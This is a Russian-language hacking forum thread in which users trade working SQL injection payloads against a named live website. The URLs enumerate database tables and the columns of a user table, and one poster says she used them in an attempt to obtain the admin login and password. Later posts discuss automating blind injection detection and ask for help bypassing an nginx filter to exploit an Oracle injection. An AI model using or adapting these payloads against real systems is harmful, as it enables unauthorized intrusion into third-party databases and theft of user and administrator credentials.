13.10.2014, 22:32
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от faza02
забавный случай. ответ отдается в редиректе, то есть при запросе
Код:
http://bitptc.com/recommends/?id=-5+union+select+1,version(),3--+
получим ответ в редиректе с версией
 все правильно, но таблицы вывести не получится, прав не хватит
|
|
|
14.10.2014, 00:15
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
есть там всё
Код:
http://bitptc.com/recommends/?id=-5+union+select+1,/*!table_name*/,3+from+information_schema.tables--+
|
|
|
|
14.10.2014, 01:06
|
|
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами:
6384566
Репутация:
1
|
|
блин((
а как теперь из таблицы например microfaucet_users вывести имена столбцов?
|
|
|
|
14.10.2014, 02:11
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от madam
блин((
а как теперь из таблицы например microfaucet_users вывести имена столбцов?
Код:
http://bitptc.com/recommends/?id=-5+union+select+1,/*!column_name*/,3+from+information_schema.columns+where+/*!table_name*/=0x6d6963726f6661756365745f7573657273--+
|
|
|
|
15.10.2014, 12:29
|
|
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами:
6384566
Репутация:
1
|
|
Сообщение от faza02
Код:
http://bitptc.com/recommends/?id=-5+union+select+1,/*!column_name*/,3+from+information_schema.columns+where+/*!table_name*/=0x6d6963726f6661756365745f7573657273--+
спасибо)) только логин и пасс админа всё равно не нашла(( видать в конфиге спрятал))
|
|
|
|
22.10.2014, 23:35
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
какие возможные алгоритмы для определния sqli? то, что пришло в голову:
берем уязвимый параметр, подставляем в параметр сначала id=5+and+1=1-- и сравниваем размер страницы (или diff) с первоначальной (id=5). если результат одинаковый, то id=5+and+1=2-- и также сравниваем с размером исходной страницы. ваши идеи? что делать в случае, если на странице рандомно генерируемые объекты?
|
|
|
|
22.10.2014, 23:38
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами:
7854806
Репутация:
173
|
|
Сообщение от faza02
какие возможные алгоритмы для определния sqli? то, что пришло в голову:
берем уязвимый параметр, подставляем в параметр сначала id=5+and+1=1-- и сравниваем размер страницы (или diff) с первоначальной (id=5). если результат одинаковый, то id=5+and+1=2-- и также сравниваем с размером исходной страницы. ваши идеи? что делать в случае, если на странице рандомно генерируемые объекты?
иногда тупо order by помогает определить уязвимость
|
|
|
|
22.10.2014, 23:51
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
это ты глазами увидишь, а как быть с автоматизацией? вомзожен такой вариант, что размер страницы особо не поменяется (пара кб или меньше)
|
|
|
|
23.10.2014, 00:42
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от faza02
это ты глазами увидишь, а как быть с автоматизацией? вомзожен такой вариант, что размер страницы особо не поменяется (пара кб или меньше)
Как вариант можно рассмотреть через sleep(), как то на практике встречалась уязвимость, которая генерировала координаты на картинке, само тело страници не менялось, зато менялся вес картинки, пришлось писать скрипт для автоматизации скули где вес картинки больше n-го размера, там true.
|
|
|
|
23.10.2014, 15:26
|
|
Новичок
Регистрация: 19.12.2008
Сообщений: 18
С нами:
9155135
Репутация:
0
|
|
Столкнулся тут с oracle. Иньекция ли это и возможно ли её раскрутить?
есть поле ввода, ввожу параметр ;; и выдаёт ошибку:
Код:
java.sql.SQLException: ORA-20000: ORA-29902: error in executing ODCIIndexStart() routine ORA-20000:
Oracle Text error: DRG-50901: text query parser syntax error on line 1, column 3 ;
ORA-06512: at "SYS.DBMS_SQL", line 1841 ORA-06512: at "MP.MP_GATE", line 668 ORA-06512: at "MP.MP_GATE", line 681 ORA-29902: error in executing ODCIIndexStart() routine ORA-20000:
Oracle Text error: DRG-50901: text query parser syntax error on line 1, column 3 ORA-06512: at line 1
ввожу ">qweqweqwe;
Код:
java.sql.SQLException: ORA-20000: ORA-29902: error in executing ODCIIndexStart() routine ORA-20000:
Oracle Text error: DRG-50900: text query parser error on line 1, column 4 DRG-50905: invalid score threshold QWEQWEQWE ;
ORA-06512: at "SYS.DBMS_SQL", line 1841 ORA-06512: at "MP.MP_GATE", line 668 ORA-06512: at "MP.MP_GATE", line 681 ORA-29902: error in executing ODCIIndexStart() routine ORA-20000:
Oracle Text error: DRG-50900: text query parser error on line 1, column 4 DRG-50905: invalid score threshold QWEQWEQWE ORA-06512: at line 1
ввожу ">order+by+1;
Код:
java.sql.SQLException: ORA-20000: ORA-29902: error in executing ODCIIndexStart() routine ORA-20000:
Oracle Text error: DRG-50900: text query parser error on line 1, column 4 DRG-50905: invalid score threshold ORDER+BY+1 ;
ORA-06512: at "SYS.DBMS_SQL", line 1841 ORA-06512: at "MP.MP_GATE", line 668 ORA-06512: at "MP.MP_GATE", line 681 ORA-29902: error in executing ODCIIndexStart()
routine ORA-20000: Oracle Text error: DRG-50900: text query parser error on line 1, column 4 DRG-50905: invalid score threshold ORDER+BY+1 ORA-06512: at line 1
ввести select, union в любом регистре, откоментировать -- или /* не возможно, nginx фильтрует и сразу редиректит на страницу с ошибкой
Прошу помощи |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
